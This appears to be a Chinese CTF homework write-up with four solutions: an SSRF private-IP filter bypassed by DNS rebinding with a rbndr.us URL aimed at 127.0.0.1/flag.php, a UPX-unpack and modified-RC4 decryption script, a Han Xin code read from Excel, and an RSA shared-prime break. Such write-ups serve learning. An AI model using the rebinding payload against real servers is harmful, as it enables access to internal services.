1.14作业

1

if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {die('ip!');
}echo file_get_contents($_POST['url']);

可以DNS重绑定

?url=http://7f000001.2b81c857.rbndr.us/flag.php

rbndr.us dns rebinding service

2 packed

拖入发现upx的壳

直接脱壳失败:010将前三个改为UPX，然后脱壳
根据下面两个判断推测是一个魔改rc4，使用的是加法

密文输入是34位，直接输34个a，然后将input中的数据提取出来

#include<stdio.h>int main()
{unsigned char enc[] = {0x9E, 0x56, 0x81, 0x83, 0xBF, 0x4F, 0x7D, 0x83, 0xF0, 0x69, 0x0D, 0xBF, 0x7A, 0x86, 0xF7, 0x21, 0x5C, 0x04, 0x5F, 0x74, 0x64, 0xA5, 0x95, 0xCF, 0x6A, 0x72, 0x7E, 0x01, 0xF9, 0xC9, 0x9F, 0x51, 0xD3, 0x5F};unsigned char data[] = {0xBB, 0x76, 0x8F, 0xA1, 0xCC, 0x6A, 0x63, 0x8F, 0xE3, 0x5A, 0x3A, 0xBD, 0x70, 0x82, 0xF4, 0x23, 0x5B, 0xEC, 0x61, 0xA1, 0x66, 0x9F, 0x84, 0xFD, 0x97, 0x5F, 0x80, 0x1A, 0x19, 0xE7, 0xB5, 0x6D, 0xE2, 0x43};for(int i = 0; i < 34; i++){printf("%c", (unsigned char)(enc[i] - (unsigned char)(data[i] - 'a')));}return 0;
}

3excel骚操作

将值为1的单元格涂黑。突出显示单元格规则，设置黑色，调整行高。

不是常规的二维码，这里是汉信码

打开中国编码网下载对应app，扫码得到flag

4

from Crypto.Util.number import *
from Crypto import *
import gmpy2
import libnumn1=9116072673585619132111895403642168497263071691827949298017531396382827298782303749867264589825807183797020472968464660582686417921434431658511530041563901
n2=9676471733476806363827533442570967957871359923261140318101161479170327996682930238809368950608051282208303548660410073403065643718187781752130771337383629
c1=8824462894263393560944306775755201891143487603309462108944270494215822172733677936731309917183407096166230876035017809219712288813600390461631853255239986
c2=5015105118262293349286521985688699702504989063271993070991789714282577934372078450119431649574609758836593485914932778436203219098204688867565801371889451
e=65535q=gmpy2.gcd(n1,n2)
p1=n1//q
phi_n=(q-1)*(p1-1)
d1=libnum.invmod(e,phi_n)
m=pow(c1,d1,n1)
print(long_to_bytes(m))